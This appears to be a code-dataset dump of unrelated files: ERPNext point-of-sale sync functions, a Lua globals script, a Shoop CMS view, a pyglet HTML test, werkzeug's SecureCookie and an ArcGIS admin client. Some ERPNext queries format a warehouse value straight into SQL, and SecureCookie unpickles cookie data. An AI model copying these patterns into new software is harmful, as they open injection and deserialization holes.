            name, item_code, item_name, description, item_group, expense_account, has_batch_no,
            has_serial_no, expense_account, selling_cost_center, stock_uom, image,
            default_warehouse, is_stock_item
        from
            tabItem
        where
            disabled = 0 and has_variants = 0 and is_sales_item = 1 and {cond}
        """.format(cond=cond), tuple(item_groups), as_dict=1)
def get_customers_list(pos_profile):
    """Return enabled customers, optionally restricted to the customer groups
    configured on the POS Profile; {} when the query yields nothing."""
    cond = "1=1"
    customer_groups = []
    if pos_profile.get('customer_groups'):
        # Get customers based on the customer groups defined in the POS profile;
        # one %s placeholder per group keeps the values parameterized.
        cond = "customer_group in (%s)"%(', '.join(['%s']*len(pos_profile.get('customer_groups'))))
        customer_groups = [d.customer_group for d in pos_profile.get('customer_groups')]
    return frappe.db.sql(""" select name, customer_name, customer_group,
        territory from tabCustomer where disabled = 0
        and {cond}""".format(cond=cond), tuple(customer_groups), as_dict=1) or {}
def get_serial_no_data(pos_profile, company):
    """Return serial-number data grouped by item code.

    Shape: {item_code: {serial_no: warehouse}}, e.g.
    {'Nokia Lumia 1020': {'SN0001': 'Pune'}}. Only serial nos belonging to
    *company* are considered; when the POS Profile maintains stock, results
    are further restricted to its warehouse.
    """
    cond = "1=1"
    if pos_profile.get('update_stock') and pos_profile.get('warehouse'):
        # NOTE(review): warehouse is interpolated into the SQL string. It comes
        # from the POS Profile (admin-configured), not end-user input, but
        # parameterizing it would be safer.
        cond = "warehouse = '{0}'".format(pos_profile.get('warehouse'))
    serial_nos = frappe.db.sql("""select name, warehouse, item_code from `tabSerial No` where {0}
        and company = %(company)s """.format(cond), {'company': company}, as_dict=1)
    itemwise_serial_no = {}
    for sn in serial_nos:
        # setdefault both creates the per-item bucket on first sight and
        # returns it, so no separate membership test is needed.
        itemwise_serial_no.setdefault(sn.item_code, {})[sn.name] = sn.warehouse
    return itemwise_serial_no
def get_batch_no_data():
    """Return unexpired batch names grouped by item code.

    Shape: {item_code: [batch_name, ...]}, e.g. {'LED-GRE': ['B001', 'B002']}.
    Batches with no expiry date are treated as far-future ('4000-10-10') and
    therefore always included.
    """
    itemwise_batch = {}
    batches = frappe.db.sql("""select name, item from `tabBatch`
        where ifnull(expiry_date, '4000-10-10') >= curdate()""", as_dict=1)
    for batch in batches:
        # setdefault creates the list on first sight, replacing the original
        # redundant membership check.
        itemwise_batch.setdefault(batch.item, []).append(batch.name)
    return itemwise_batch
def get_item_tax_data():
    """Return default item taxes grouped by item.

    Shape: {item_code: {tax_type: tax_rate}}, e.g.
    {'Consulting Services': {'Excise 12 - TS': '12.000'}}.
    """
    itemwise_tax = {}
    taxes = frappe.db.sql(""" select parent, tax_type, tax_rate from `tabItem Tax`""", as_dict=1)
    for tax in taxes:
        # setdefault creates the per-item dict on first sight, replacing the
        # original redundant membership check.
        itemwise_tax.setdefault(tax.parent, {})[tax.tax_type] = tax.tax_rate
    return itemwise_tax
def get_price_list_data(selling_price_list):
    """Return {item_code: price_list_rate} for the given selling price list."""
    price_rows = frappe.db.sql("""Select ifnull(price_list_rate, 0) as price_list_rate,
        item_code from `tabItem Price` ip where price_list = %(price_list)s""",
        {'price_list': selling_price_list}, as_dict=1)
    # Later rows overwrite earlier ones for the same item, exactly as the
    # original assignment loop did.
    return dict((row.item_code, row.price_list_rate) for row in price_rows)
def get_bin_data(pos_profile):
    """Return positive stock levels grouped by item code.

    Shape: {item_code: {warehouse: actual_qty}}; when the POS Profile names a
    warehouse, only bins of that warehouse are included.
    """
    itemwise_bin_data = {}
    cond = "1=1"
    if pos_profile.get('warehouse'):
        # NOTE(review): warehouse is interpolated into the SQL string; it is
        # admin-configured, but parameterizing it would be safer.
        cond = "warehouse = '{0}'".format(pos_profile.get('warehouse'))
    bin_data = frappe.db.sql(""" select item_code, warehouse, actual_qty from `tabBin`
        where actual_qty > 0 and {cond}""".format(cond=cond), as_dict=1)
    for bins in bin_data:
        # setdefault creates the per-item dict on first sight, replacing the
        # original redundant membership check.
        itemwise_bin_data.setdefault(bins.item_code, {})[bins.warehouse] = bins.actual_qty
    return itemwise_bin_data
def get_pricing_rule_data(doc):
    """Return active selling Pricing Rules applicable to the invoice's company
    and price list, valid today, highest priority first; returns '' when the
    profile says to ignore pricing rules."""
    pricing_rules = ""
    if doc.ignore_pricing_rule == 0:
        pricing_rules = frappe.db.sql(""" Select * from `tabPricing Rule` where docstatus < 2
            and ifnull(for_price_list, '') in (%(price_list)s, '') and selling = 1
            and ifnull(company, '') in (%(company)s, '') and disable = 0 and %(date)s
            between ifnull(valid_from, '2000-01-01') and ifnull(valid_upto, '2500-12-31')
            order by priority desc, name desc""",
            {'company': doc.company, 'price_list': doc.selling_price_list, 'date': nowdate()}, as_dict=1)
    return pricing_rules
@frappe.whitelist()
def make_invoice(doc_list):
    """Create and submit Sales Invoices from offline POS payloads.

    *doc_list* is a (possibly JSON-encoded) list of {offline_pos_name: doc}
    mappings. Invoices already synced (docstatus < 2) are skipped. Returns
    the list of offline names processed so the client can mark them synced.
    """
    if isinstance(doc_list, basestring):
        doc_list = json.loads(doc_list)
    name_list = []
    for docs in doc_list:
        for name, doc in docs.items():
            if not frappe.db.exists('Sales Invoice',
                {'offline_pos_name': name, 'docstatus': ("<", "2")}):
                validate_records(doc)
                si_doc = frappe.new_doc('Sales Invoice')
                si_doc.offline_pos_name = name
                si_doc.update(doc)
                submit_invoice(si_doc, name)
            # Record the name whether we just created the invoice or it
            # already existed (previously duplicated in both branches).
            name_list.append(name)
    return name_list
def validate_records(doc):
    """Ensure the customer and every item referenced by *doc* exist,
    creating any that are missing."""
    validate_customer(doc)
    validate_item(doc)
def validate_customer(doc):
    """Ensure the invoice's customer exists; create it on the fly for
    offline-created customers and rewrite doc['customer'] to the saved name."""
    if not frappe.db.exists('Customer', doc.get('customer')):
        customer_doc = frappe.new_doc('Customer')
        customer_doc.customer_name = doc.get('customer')
        customer_doc.customer_type = 'Company'
        customer_doc.customer_group = doc.get('customer_group')
        customer_doc.territory = doc.get('territory')
        customer_doc.save(ignore_permissions = True)
        # Commit immediately so the customer survives a later invoice rollback.
        frappe.db.commit()
        doc['customer'] = customer_doc.name
def validate_item(doc):
    """Ensure every item on the invoice exists; create missing items from the
    invoice row data (offline POS may reference not-yet-synced items)."""
    for item in doc.get('items'):
        if not frappe.db.exists('Item', item.get('item_code')):
            item_doc = frappe.new_doc('Item')
            item_doc.name = item.get('item_code')
            item_doc.item_code = item.get('item_code')
            item_doc.item_name = item.get('item_name')
            item_doc.description = item.get('description')
            item_doc.default_warehouse = item.get('warehouse')
            item_doc.stock_uom = item.get('stock_uom')
            item_doc.item_group = item.get('item_group')
            item_doc.save(ignore_permissions=True)
            # Commit immediately so the item survives a later invoice rollback.
            frappe.db.commit()
def submit_invoice(si_doc, name):
    """Insert and submit the Sales Invoice; on any failure roll back and hand
    it to save_invoice() so the offline entry is kept as a draft.

    NOTE: Python 2 'except Exception, e' syntax — this module targets py2.
    """
    try:
        si_doc.insert()
        si_doc.submit()
    except Exception, e:
        # Drop frappe's queued error message so the POS client does not see a
        # failure for an invoice we are about to save as a draft instead.
        if frappe.message_log: frappe.message_log.pop()
        frappe.db.rollback()
        save_invoice(e, si_doc, name)
def save_invoice(e, si_doc, name):
    """Persist a failed invoice as a draft (docstatus 0), keyed by its offline
    POS name, and log the traceback for later inspection."""
    if not frappe.db.exists('Sales Invoice', {'offline_pos_name': name}):
        si_doc.docstatus = 0
        # Skip mandatory-field validation: better an incomplete draft than a
        # lost offline sale.
        si_doc.flags.ignore_mandatory = True
        si_doc.insert()
        frappe.log_error(frappe.get_traceback())
|
unknown
|
codeparrot/codeparrot-clean
| ||
-- reads luac listings and reports global variable usage
-- lines where a global is written to are marked with "*"
-- typical usage: luac -p -l file.lua | lua globals.lua | sort | lua table.lua
while 1 do
 local s=io.read()
 if s==nil then break end -- EOF: stop
 -- match "[line] ... GETGLOBAL/SETGLOBAL ... ; name" from the luac -l listing;
 -- captures: l = source line number, op = "G" or "S", g = global's name
 local ok,_,l,op,g=string.find(s,"%[%-?(%d*)%]%s*([GS])ETGLOBAL.-;%s+(.*)$")
 if ok then
  if op=="S" then op="*" else op="" end -- "*" marks a write (SETGLOBAL)
  io.write(g,"\t",l,op,"\n")
 end
end
|
unknown
|
github
|
https://github.com/redis/redis
|
deps/lua/test/globals.lua
|
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2015, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from django.core.urlresolvers import reverse
from django.http import Http404
from django.http.response import HttpResponseRedirect
from django.utils.translation import get_language
from django.views.generic.detail import DetailView
from shoop.simple_cms.models import Page
class PageView(DetailView):
    """DetailView rendering a simple-CMS Page looked up by its translated URL."""
    model = Page
    # Match the "url" URL kwarg against the translated url field of the page.
    slug_field = "translations__url"
    slug_url_kwarg = "url"
    template_name = "shoop/simple_cms/page.jinja"
    context_object_name = "page"
    def get(self, request, *args, **kwargs):
        """
        Override normal get method to return correct page based on the active language and slug
        Cases:
        1. Page is not found: `raise Http404()` like django would
        2. No translation in active language for the page: `raise Http404()`
        3. Translation was found for active language, but the url doesn't match given url:
           `return HttpResponseRedirect` to the active languages url
        4. If none of the upper matches: render page normally
        """
        # get currently active language
        self.object = self.get_object()
        if not self.object.has_translation(get_language()):
            # Page hasn't been translated into the current language; that's always a 404
            raise Http404()
        self.object.set_current_language(get_language())
        if self.object.url != self.kwargs[self.slug_url_kwarg]:  # Wrong URL, hm!
            # Canonicalize: redirect to this page's URL in the active language.
            return HttpResponseRedirect(reverse('shoop:cms_page', kwargs={"url": self.object.url}))
        context = self.get_context_data(object=self.object)
        return self.render_to_response(context)
    def get_queryset(self):
        if self.request.user.is_superuser:
            # Superusers may see all pages despite their visibility status
            return self.model.objects.all()
        return self.model.objects.visible()
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
'''Test that HTML data is decoded into a formatted document.
Press ESC to exit the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: ELEMENT.py 1764 2008-02-16 05:24:46Z Alex.Holkner $'
import unittest
import pyglet
from pyglet.text import caret, document, layout
doctext = '''
<html>
<head>
(metadata including title is not displayed.)
<title>Test document</title>
</head>
<body>
<h1>HTML test document</h1>
<p>Several paragraphs of HTML formatted text follow. Ensure they are
formatted as they are described. Here is a copyright symbol: © and
again, using hexadecimal ref: ©.</p>
<P>This paragraph has some <b>bold</b> and <i>italic</i> and <b><i>bold
italic</b> text. <!-- i tag does not need to be closed -->
<p>This paragraph has some <em>emphasis</em> and <strong>strong</strong>
and <em><strong>emphatic strong</em> text.
<p>This paragraph demonstrates superscript: a<sup>2</sup> + b<sup>2</sup>
= c<sup>2</sup>; and subscript: H<sub>2</sub>O.
<p>This paragraph uses the <font> element:
<font face="Courier New">Courier New</font>, <font size=1>size 1</font>,
<font size=2>size 2</font>, <font size=3>size 3</font>, <font size=4>size
4</font>, <font size=5>size 5</font>, <font size=6>size 6</font>, <font
size=7>size 7</font>.
<p>This paragraph uses relative sizes: <font size=5>size 5<font
size=-2>size 3</font><!--<font size=+1>size 6</font>--></font>
<p>Font color changes to <font color=red>red</font>, <font
color=green>green</font> and <font color=#0f0fff>pastel blue using a
hexidecimal number</font>.
<p><u>This text is underlined</u>. <font color=green><u>This text is
underlined and green.</u></font>
<h1>Heading 1
<h2>Heading 2
<h3>Heading 3
<h4>Heading 4
<h5>Heading 5
<h6>Heading 6
<p align=center>Centered paragraph.
<p align=right>Right-aligned paragraph.
<div><div> element instead of paragraph.
<div>This sentence should start a new paragraph, as the div is nested.
</div>
This sentence should start a new paragraph, as the nested div was
closed.
</div>
<pre>This text is preformatted.
Hard line breaks
Indentation. <b>Inline formatting</b> is still ok.</pre>
<p>This paragraph<br>
has a<br>
line break<br>
after every<br>
two words.</p>
<blockquote>This paragraph is blockquote. Lorem ipsum dolor sit amet,
consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore
et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation
ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure
dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat
nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in
culpa qui officia deserunt mollit anim id est laborum.
<blockquote>Nested blockquote. Lorem ipsum dolor sit amet,
consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore
et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation
ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure
dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat
nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in
culpa qui officia deserunt mollit anim id est laborum.</blockquote>
</blockquote>
Here is a quotation. The previous paragraph mentioned, <q>Lorem ipsum
dolor sit amet, ...</q>.
<ul>
<li>
Unordered list, level 1. Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor incididunt ut labore et
dolore magna aliqua. Ut enim ad minim veniam, quis nostrud
exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat.
<li>
Item 2. Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor incididunt ut labore et
dolore magna aliqua. Ut enim ad minim veniam, quis nostrud
exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat.
<li>
Item 3. Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor incididunt ut labore et
dolore magna aliqua. Ut enim ad minim veniam, quis nostrud
exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat.
<ul>
<li>
A nested list. Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor incididunt ut
labore et dolore magna aliqua. Ut enim ad minim veniam,
quis nostrud exercitation ullamco laboris nisi ut aliquip
ex ea commodo consequat.
<li>
Item 3.2. Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor incididunt ut
labore et dolore magna aliqua.
</ul>
</ul>
<ul type="circle">
<li>Unordered list with circle bullets.
<li>Item 2.
</ul>
<ul type="square">
<li>Unordered list with square bullets.
<li>Item 2.
</ul>
<ol>
<li>Numbered list.
<li>Item 2.
<li>Item 3.
<li value=10>Item 10
<li>Item 11
</ol>
<ol start=12>
<li>Numbered list starting at 12.
<li>Item 13.
</ol>
<ol type="a">
<li>Numbered list with "a" type
<li>Item 2
<li>Item 3
</ol>
<ol type="A">
<li>Numbered list with "A" type
<li>Item 2
<li>Item 3
</ol>
<ol type="i">
<li>Numbered list with "i" type
<li>Item 2
<li>Item 3
</ol>
<ol type="I">
<li>Numbered list with "I" type
<li>Item 2
<li>Item 3
</ol>
Here's a definition list:
<dl>
<dt>Term</dt>
<dd>Definition.</dd>
<dt>Term</dt>
<dd>Definition.</dd>
<dt>Term</dt>
<dd>Definition.</dd>
</dl>
</body>
</html>
'''
class TestWindow(pyglet.window.Window):
    """Window that displays the decoded HTML document with an editable
    caret.  Closing the window (ESC by pyglet default) ends the test."""

    def __init__(self, *args, **kwargs):
        super(TestWindow, self).__init__(*args, **kwargs)
        self.batch = pyglet.graphics.Batch()
        self.document = pyglet.text.decode_html(doctext)
        self.margin = 2
        usable_w = self.width - self.margin * 2
        usable_h = self.height - self.margin * 2
        self.layout = layout.IncrementalTextLayout(self.document,
            usable_w, usable_h,
            multiline=True,
            batch=self.batch)
        self.caret = caret.Caret(self.layout)
        self.push_handlers(self.caret)
        self.set_mouse_cursor(self.get_system_mouse_cursor('text'))

    def on_resize(self, width, height):
        super(TestWindow, self).on_resize(width, height)
        # Group the geometry changes so the layout reflows only once.
        self.layout.begin_update()
        self.layout.x = self.margin
        self.layout.y = self.margin
        self.layout.width = width - self.margin * 2
        self.layout.height = height - self.margin * 2
        self.layout.end_update()

    def on_mouse_scroll(self, x, y, scroll_x, scroll_y):
        # Horizontal scroll pans; each vertical notch moves 16 pixels.
        self.layout.view_x -= scroll_x
        self.layout.view_y += scroll_y * 16

    def on_draw(self):
        # White background behind the rendered document.
        pyglet.gl.glClearColor(1, 1, 1, 1)
        self.clear()
        self.batch.draw()

    def on_key_press(self, symbol, modifiers):
        super(TestWindow, self).on_key_press(symbol, modifiers)
        if symbol == pyglet.window.key.TAB:
            # The caret swallows TAB by default; feed it through as text.
            self.caret.on_text('\t')
class TestCase(unittest.TestCase):
    """Interactive test: shows the window and passes when it is closed."""

    def test(self):
        win = TestWindow(resizable=True, visible=False)
        self.window = win
        # Create hidden first so the initial layout happens off-screen.
        win.set_visible()
        pyglet.app.run()
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
r"""
werkzeug.contrib.securecookie
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module implements a cookie that is not alterable from the client
because it adds a checksum the server checks for. You can use it as
session replacement if all you have is a user id or something to mark
a logged in user.
Keep in mind that the data is still readable from the client as a
normal cookie is. However you don't have to store and flush the
sessions you have at the server.
Example usage:
>>> from werkzeug.contrib.securecookie import SecureCookie
>>> x = SecureCookie({"foo": 42, "baz": (1, 2, 3)}, "deadbeef")
Dumping into a string so that one can store it in a cookie:
>>> value = x.serialize()
Loading from that string again:
>>> x = SecureCookie.unserialize(value, "deadbeef")
>>> x["baz"]
(1, 2, 3)
If someone modifies the cookie and the checksum is wrong the unserialize
method will fail silently and return a new empty `SecureCookie` object.
Keep in mind that the values will be visible in the cookie so do not
store data in a cookie you don't want the user to see.
Application Integration
=======================
If you are using the werkzeug request objects you could integrate the
secure cookie into your application like this::
from werkzeug.utils import cached_property
from werkzeug.wrappers import BaseRequest
from werkzeug.contrib.securecookie import SecureCookie
# don't use this key but a different one; you could just use
# os.urandom(20) to get something random
SECRET_KEY = '\xfa\xdd\xb8z\xae\xe0}4\x8b\xea'
class Request(BaseRequest):
@cached_property
def client_session(self):
data = self.cookies.get('session_data')
if not data:
return SecureCookie(secret_key=SECRET_KEY)
return SecureCookie.unserialize(data, SECRET_KEY)
def application(environ, start_response):
request = Request(environ)
# get a response object here
response = ...
if request.client_session.should_save:
session_data = request.client_session.serialize()
response.set_cookie('session_data', session_data,
httponly=True)
return response(environ, start_response)
A less verbose integration can be achieved by using shorthand methods::
class Request(BaseRequest):
@cached_property
def client_session(self):
return SecureCookie.load_cookie(self, secret_key=COOKIE_SECRET)
def application(environ, start_response):
request = Request(environ)
# get a response object here
response = ...
request.client_session.save_cookie(response)
return response(environ, start_response)
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import pickle
import base64
from hmac import new as hmac
from time import time
from hashlib import sha1 as _default_hash
from werkzeug._compat import iteritems, text_type
from werkzeug.urls import url_quote_plus, url_unquote_plus
from werkzeug._internal import _date_to_unix
from werkzeug.contrib.sessions import ModificationTrackingDict
from werkzeug.security import safe_str_cmp
from werkzeug._compat import to_native
class UnquoteError(Exception):
    """Internal exception used to signal failures on quoting.

    Raised by :meth:`SecureCookie.unquote` when a cookie value cannot be
    decoded or deserialized; :meth:`SecureCookie.unserialize` catches it
    and falls back to an empty cookie.
    """
class SecureCookie(ModificationTrackingDict):
    """Represents a secure cookie.  You can subclass this class and provide
    an alternative mac method.  The important thing is that the mac method
    is a function with a similar interface to the hashlib.  Required
    methods are update() and digest().

    Example usage:

    >>> x = SecureCookie({"foo": 42, "baz": (1, 2, 3)}, "deadbeef")
    >>> x["foo"]
    42
    >>> x["baz"]
    (1, 2, 3)
    >>> x["blafasel"] = 23
    >>> x.should_save
    True

    :param data: the initial data.  Either a dict, list of tuples or `None`.
    :param secret_key: the secret key.  If not set `None` or not specified
                       it has to be set before :meth:`serialize` is called.
    :param new: The initial value of the `new` flag.
    """

    #: The hash method to use.  This has to be a module with a new function
    #: or a function that creates a hashlib object.  Such as `hashlib.md5`
    #: Subclasses can override this attribute.  The default hash is sha1.
    #: Make sure to wrap this in staticmethod() if you store an arbitrary
    #: function there such as hashlib.sha1 which might be implemented
    #: as a function.
    hash_method = staticmethod(_default_hash)

    #: the module used for serialization.  Unless overridden by subclasses
    #: the standard pickle module is used.
    serialization_method = pickle

    #: if the contents should be base64 quoted.  This can be disabled if the
    #: serialization process returns cookie safe strings only.
    quote_base64 = True

    def __init__(self, data=None, secret_key=None, new=True):
        ModificationTrackingDict.__init__(self, data or ())
        # hmac requires a byte string key.  The previous ``bytes(secret_key)``
        # raises TypeError for str keys on Python 3 (and implicitly
        # ascii-encodes on Python 2), so encode text keys explicitly.
        if secret_key is not None:
            if isinstance(secret_key, text_type):
                secret_key = secret_key.encode('utf-8')
            else:
                secret_key = bytes(secret_key)
        self.secret_key = secret_key
        self.new = new

    def __repr__(self):
        # Trailing '*' marks a cookie with unsaved modifications.
        return '<%s %s%s>' % (
            self.__class__.__name__,
            dict.__repr__(self),
            self.should_save and '*' or ''
        )

    @property
    def should_save(self):
        """True if the session should be saved.  By default this is only true
        for :attr:`modified` cookies, not :attr:`new`.
        """
        return self.modified

    @classmethod
    def quote(cls, value):
        """Quote the value for the cookie.  This can be any object supported
        by :attr:`serialization_method`.

        :param value: the value to quote.
        """
        if cls.serialization_method is not None:
            value = cls.serialization_method.dumps(value)
        if cls.quote_base64:
            # Strip the newlines base64 may insert so the value is one line.
            value = b''.join(base64.b64encode(value).splitlines()).strip()
        return value

    @classmethod
    def unquote(cls, value):
        """Unquote the value for the cookie.  If unquoting does not work a
        :exc:`UnquoteError` is raised.

        :param value: the value to unquote.
        """
        try:
            if cls.quote_base64:
                value = base64.b64decode(value)
            if cls.serialization_method is not None:
                value = cls.serialization_method.loads(value)
            return value
        except Exception:
            # unfortunately pickle and other serialization modules can
            # cause pretty much every error here.  if we get one we catch it
            # and convert it into an UnquoteError
            raise UnquoteError()

    def serialize(self, expires=None):
        """Serialize the secure cookie into a string.

        If expires is provided, the session will be automatically invalidated
        after expiration when you unserialize it.  This provides better
        protection against session cookie theft.

        :param expires: an optional expiration date for the cookie (a
                        :class:`datetime.datetime` object)
        """
        if self.secret_key is None:
            raise RuntimeError('no secret key defined')
        if expires:
            self['_expires'] = _date_to_unix(expires)
        result = []
        mac = hmac(self.secret_key, None, self.hash_method)
        # Sort keys so the signature is stable regardless of insert order.
        for key, value in sorted(self.items()):
            result.append(('%s=%s' % (
                url_quote_plus(key),
                self.quote(value).decode('ascii')
            )).encode('ascii'))
            mac.update(b'|' + result[-1])
        return b'?'.join([
            base64.b64encode(mac.digest()).strip(),
            b'&'.join(result)
        ])

    @classmethod
    def unserialize(cls, string, secret_key):
        """Load the secure cookie from a serialized string.

        :param string: the cookie value to unserialize.
        :param secret_key: the secret key used to serialize the cookie.
        :return: a new :class:`SecureCookie`.
        """
        if isinstance(string, text_type):
            string = string.encode('utf-8', 'replace')
        if isinstance(secret_key, text_type):
            secret_key = secret_key.encode('utf-8', 'replace')
        try:
            base64_hash, data = string.split(b'?', 1)
        except (ValueError, IndexError):
            items = ()
        else:
            items = {}
            mac = hmac(secret_key, None, cls.hash_method)
            for item in data.split(b'&'):
                mac.update(b'|' + item)
                if b'=' not in item:
                    items = None
                    break
                key, value = item.split(b'=', 1)
                # try to make the key a string
                key = url_unquote_plus(key.decode('ascii'))
                try:
                    key = to_native(key)
                except UnicodeError:
                    pass
                items[key] = value

            # no parsing error and the mac looks okay, we can now
            # securely unpickle our cookie.
            try:
                client_hash = base64.b64decode(base64_hash)
            except (TypeError, ValueError):
                # Python 2 raises TypeError for bad base64; Python 3 raises
                # binascii.Error, which is a ValueError subclass.
                items = client_hash = None
            if items is not None and safe_str_cmp(client_hash, mac.digest()):
                try:
                    for key, value in iteritems(items):
                        items[key] = cls.unquote(value)
                except UnquoteError:
                    items = ()
                else:
                    if '_expires' in items:
                        if time() > items['_expires']:
                            items = ()
                        else:
                            del items['_expires']
            else:
                items = ()
        # A failed signature/parse yields an empty (but valid) cookie.
        return cls(items, secret_key, False)

    @classmethod
    def load_cookie(cls, request, key='session', secret_key=None):
        """Loads a :class:`SecureCookie` from a cookie in request.  If the
        cookie is not set, a new :class:`SecureCookie` instance is
        returned.

        :param request: a request object that has a `cookies` attribute
                        which is a dict of all cookie values.
        :param key: the name of the cookie.
        :param secret_key: the secret key used to unquote the cookie.
                           Always provide the value even though it has
                           no default!
        """
        data = request.cookies.get(key)
        if not data:
            return cls(secret_key=secret_key)
        return cls.unserialize(data, secret_key)

    def save_cookie(self, response, key='session', expires=None,
                    session_expires=None, max_age=None, path='/', domain=None,
                    secure=None, httponly=False, force=False):
        """Saves the SecureCookie in a cookie on response object.  All
        parameters that are not described here are forwarded directly
        to :meth:`~BaseResponse.set_cookie`.

        :param response: a response object that has a
                         :meth:`~BaseResponse.set_cookie` method.
        :param key: the name of the cookie.
        :param session_expires: the expiration date of the secure cookie
                                stored information.  If this is not provided
                                the cookie `expires` date is used instead.
        """
        if force or self.should_save:
            data = self.serialize(session_expires or expires)
            response.set_cookie(key, data, expires=expires, max_age=max_age,
                                path=path, domain=domain, secure=secure,
                                httponly=httponly)
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""Implementation of the objects for the ArcGIS Server REST
Administration API"""
import cgi
import itertools
import os.path
import urllib
import urlparse
import urllib2
from arcrest import server, GenerateToken
__all__ = ['Admin', 'Folder', 'Services', 'Service',
'Machine', 'Machines', 'SiteMachines', 'ClusterMachines',
'Directory', 'Directories',
'Clusters', 'Cluster']
class Admin(server.RestURL):
    """Represents the top level URL resource of the ArcGIS Server
       Administration API"""

    def __init__(self, url, username=None, password=None,
                 token=None, generate_token=False,
                 expiration=60):
        # The admin root URL must end with a trailing slash.
        parts = list(urlparse.urlsplit(url))
        if not parts[2].endswith('/'):
            parts[2] += "/"
        url = urlparse.urlunsplit(parts)
        if username is not None and password is not None:
            self._pwdmgr.add_password(None, url, username, password)
        if token:
            self.__token__ = token
        elif generate_token:
            # Acquire a token before the base class performs any requests.
            self.__generateToken(url, username, password, expiration)
        super(Admin, self).__init__(url)

    @property
    def resources(self):
        return self._json_struct['resources']

    @property
    def currentVersion(self):
        return self._json_struct['currentVersion']

    @property
    def clusters(self):
        return self._get_subfolder("./clusters/", Clusters)

    @property
    def services(self):
        return self._get_subfolder("./services/", Services)

    @property
    def machines(self):
        return self._get_subfolder("./machines/", SiteMachines)

    @property
    def data(self):
        return self._get_subfolder("./data/", Data)

    @property
    def uploads(self):
        return self._get_subfolder('./uploads/', Uploads)

    @property
    def system(self):
        return self._get_subfolder("./system/", System)

    def createNewSite(self, username, password, configStoreConnection=None,
                      directories=None, cluster=None):
        """Create a brand new site, then fetch a token for it."""
        params = {'username': username,
                  'password': password,
                  'configStoreConnection': configStoreConnection,
                  'directories': directories,
                  'cluster': cluster}
        res = self._get_subfolder("./createNewSite",
                                  server.JsonPostResult,
                                  params)
        self.__generateToken(self.url, username, password, 60)
        return res

    def joinSite(self, adminURL, username, password):
        """Join an existing site identified by its admin URL."""
        params = {'username': username,
                  'password': password,
                  'adminURL': adminURL}
        res = self._get_subfolder("./joinSite",
                                  server.JsonPostResult,
                                  params)
        return res

    def deleteSite(self):
        """Delete the site and forget the cached token."""
        res = self._get_subfolder("./deleteSite",
                                  server.JsonPostResult)
        self.__token__ = None
        return res

    def __generateToken(self, url, username, password, expiration):
        # Request a token; surface server-side failures as URLError.
        token_auth = GenerateToken(url, username, password, expiration)
        if token_auth._json_struct.get('status', 'ok').lower() == 'error':
            messages = token_auth._json_struct.get('messages', ['Failed.'])
            raise urllib2.URLError('\n'.join(messages))
        self.__token__ = token_auth.token
class Data(server.RestURL):
    """Administration URL's data store -- Geodatabases and file data"""

    @property
    def geodatabases(self):
        """Sub-resource listing geodatabases and GDB connections."""
        return self._get_subfolder("./geodatabases/", GeoDatabases)

    @property
    def items(self):
        """Sub-resource listing the server's data files."""
        return self._get_subfolder("./items/", DataItems)
class GeoDatabases(server.RestURL):
    """Server's geodatabases and GDB connections"""
    # Placeholder: all behaviour is inherited from server.RestURL.
    pass
class HasUploads(object):
    """Mixin for admin resources that accept file uploads."""

    def upload(self, file, description=''):
        """Upload a file (path string or open file object); returns the
        uploaded item's JSON description."""
        if isinstance(file, basestring):
            # Treat strings as paths and open them in binary mode.
            file = open(file, 'rb')
        result = self._get_subfolder('./upload/', server.JsonResult,
                                     {'description': description},
                                     {'itemFile': file})
        return result._json_struct['item']
class Uploads(server.RestURL, HasUploads):
    """Uploads URL"""
    # Upload behaviour comes entirely from the HasUploads mixin.
    pass
class DataItems(server.RestURL, HasUploads):
    """Server's data files"""

    @property
    def packages(self):
        """Package items currently registered on the server."""
        return self._json_struct['packages']
class Folder(server.RestURL):
    """A folder of services on the admin API."""

    @property
    def folderName(self):
        return self._json_struct['folderName']

    @property
    def description(self):
        return self._json_struct['description']

    @property
    def serviceNames(self):
        """Service names without the type suffix."""
        return [svc['serviceName']
                for svc in self._json_struct['services']]

    @property
    def services(self):
        """A Service resource per service in this folder."""
        return [self._get_subfolder("./%s.%s/" % (svc['serviceName'],
                                                  svc['type']),
                                    Service)
                for svc in self._json_struct['services']]

    def __getitem__(self, itemname):
        # Support path-style lookups ("name/rest") by recursing.
        if '/' in itemname:
            head, rest = itemname.split('/', 1)
            return self[head][rest]
        wanted = itemname.lower()
        for svc in self._json_struct['services']:
            # Match on either "name" or "name.type", case-insensitively.
            candidates = (svc['serviceName'].lower(),
                          (svc['serviceName'] + "." + svc['type']).lower())
            if wanted in candidates:
                return self._get_subfolder("./%s.%s/" % (svc['serviceName'],
                                                         svc['type']),
                                           Service)
        raise KeyError(itemname)

    def __iter__(self):
        return iter(self.services)
class Services(Folder):
    """The root services resource: sub-folders plus top-level services."""

    def createFolder(self, folderName, description):
        raise NotImplementedError("Not implemented")

